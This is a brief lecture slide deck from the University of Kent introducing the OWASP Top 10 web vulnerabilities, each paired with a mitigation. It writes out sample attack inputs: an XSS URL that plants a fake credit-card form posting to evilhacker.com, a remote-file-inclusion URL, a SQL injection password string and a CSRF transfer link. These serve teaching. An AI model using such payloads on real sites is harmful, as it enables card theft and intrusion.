Web Security

in 15 minutes

Ben Charlton

University of Kent

OWASP Top 10

• Nice concise list
• Good starting point
• Web only - doesn't apply to desktop/network/server

Cross Site Scripting (XSS)

• Easiest to carry out.
• Can be as simple as http://www.example.com/search?q=stuff
• ... http://example.com/search?q=<blink>XSS!
• Scaling up: https://example.com/somepage?errCode=</h3><script>c=document.getElementById('content'); c.innerHTML='<form method="post" action="https://evilhacker.com/harvestCC">Enter Credit Card:<input type="text" name="cc"><input type="submit">';</script>
• ACTION:Input Validation. Escape all user supplied output.

Injection Flaws

• $sql = "SELECT userid FROM users WHERE username = '" . $_REQUEST['login'] . "' AND password = '" . $_REQUEST['pw'] . "'";
• pw = ' or 1 = '1
• SELECT userid FROM users WHERE
  username = 'admin' AND password = '' or 1='1'
• ACTION:Input Validation. Use prepared statements, or your framework DB layer.

Injection

Malicious File Execution

• http://example.com/index.php?page=about.php
• include $_REQUEST['page']
• http://example.com/index.php?page=http://evilhacker.com/exploit.php
• ACTION: Always verify user input. Firewall can help. PHP:Disable allow_url_fopen and allow_url_include

Insecure Direct Object Reference

• http://someisp.com/myemail?userid=1024
• http://someisp.com/myemail?userid=1025
• ACTION: Access Controls. Check for XSS and SQL injection.

Cross Site Request Forgery

• http://somebank.com/transfer? from=me & to=evilhacker & amount=100.00
• MySpace Logout worked with a GET request
• POST is not safe, contrary to popular belief.
• CSRF token checking provided in many frameworks. Helps, but not foolproof.
• Extremely dangerous when combined with XSS
• Samy MySpace worm - 1 million friend requests in 20 hours
• ACTION: Use framework protection. If important change, email user, or require password.

Information Leakage

• Error messages that give away too much info - filenames or paths on system
• Mostly clues, but not always
• "You have entered an incorrect username"
• "Incorrect Password"
• ACTION: Check exception/error handling. Make sure dev changes don't affect production.

Broken Authentication

• Failure to protect credentials and session data
• Rubbish password reset
• Custom 'remember me' functionality
• LDAP standard means empty password = anonymous bind, which will succeed.
• ACTION: Too many to list

Insecure Cryptographic Storage

• Reversible (or plain text) passwords
• Proprietary vendor: "passwords encrypted with military grade AES-256 encryption blah blah"
• Custom encryption (MIFARE)
• ACTION: Do not use weak algorithms for hashing: MD5 rubbish. SHA1 not great.

Insecure Communications

• Use SSL for personal information/credentials
• BEWARE THE NULL CIPHER

Failure to Restrict URL access

• Hidden URLs only presented to privileged users.
• Lucky guess: http://example.com/admin/adduser.php or http://example.com/config.php.bak
• MacWorld 2007 approved "Platinum" passes worth $1700 via JavaScript on the browser rather than on the server.
• ACTION: Verify user access controls, beware of important files that rely on security through obscurity